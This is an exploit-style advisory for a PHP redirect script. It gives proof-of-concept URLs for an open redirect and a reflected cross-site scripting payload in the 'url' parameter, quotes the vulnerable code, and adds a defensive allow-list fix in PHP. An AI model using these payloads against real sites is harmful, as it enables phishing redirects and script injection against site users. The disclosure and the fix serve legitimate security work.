[+] Exploit Title : Mr Material Redirect Script Multiple Vulnerabilities
[+] Date : 2018-07-18
[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://mrmaterial.ir
[+] Dork : ...
[+] My Site : http://4rtxtnk7o5yt3mfw.onion/
[+] Tested On : Windows 10 - Kali Linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Description :
[!] Mr Material redirect script
[+] Poc :
[!] Open Redirect : localhost/down/index.php?url=Your Link Here
[!] XSS : http://localhost/down/index.php?url=http://google.com%22%3E%3Cscript%3Ealert(1)%3C/script%3E
[+] Type of vulnerability :
[!] XSS -> Reflected
[+] Vulnerable Source Code :
[!] $redirecturl = $_GET['url'];
if (!empty ($redirecturl))
{
[+] Security Level :
[!] medium
[+] Exploitation Technique:
[!] Remote
[+] Request Method :
[!] GET
[+] Vulnerability Files :
[!] index.php
[+] Fix :
[!] Restrict user input or replace bad characters
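One way to apply the fix above to the url parameter of index.php, as an added example that is not part of the original advisory or the vendor's code. ALLOWED_HOSTS, safe_redirect_target() and the example.com hosts are assumptions; the sample URLs are constructed around the two PoC shapes listed under Poc.

```php
<?php
// Added example, not the vendor's code. ALLOWED_HOSTS and safe_redirect_target()
// are hypothetical names; the hosts and sample URLs below are constructed.
const ALLOWED_HOSTS = ['example.com', 'files.example.com'];

// Return $raw if it is an absolute http(s) URL on an allow-listed host, else null.
function safe_redirect_target($raw): ?string
{
    if (!is_string($raw) || $raw === '' || strlen($raw) > 2048) {
        return null;                    // ?url[]=x arrays, empty or oversized input
    }
    // Control chars and spaces (CR/LF header injection) and "\" (read as "/" by browsers).
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $raw)) {
        return null;
    }
    $parts = parse_url($raw);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                    // relative, scheme-relative (//host) or malformed
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                    // http://example.com@other.host/ confusion
    }
    $ok = in_array(strtolower($parts['scheme']), ['http', 'https'], true)
        && in_array(strtolower($parts['host']), ALLOWED_HOSTS, true);
    return $ok ? $raw : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs, including the two PoC shapes from the advisory.
    $samples = [
        'https://files.example.com/a.zip',
        'http://google.com',
        'http://google.com"><script>alert(1)</script>',
        'https://example.com@google.com/',
    ];
    foreach ($samples as $s) {
        echo (safe_redirect_target($s) === null ? 'reject ' : 'accept '), $s, PHP_EOL;
    }
    exit;
}

$target = safe_redirect_target($_GET['url'] ?? null);
if ($target === null) {
    http_response_code(400);
    exit('Invalid redirect target');
}
header('Location: ' . $target, true, 302);
// Any copy of the URL written into HTML is encoded for that context (stops the reflected XSS).
echo '<a href="' . htmlspecialchars($target, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">Continue</a>';
```

Run from the command line, the script prints an accept or reject verdict for each constructed sample; served over HTTP, it answers 400 for anything outside the allow-list.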
[+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker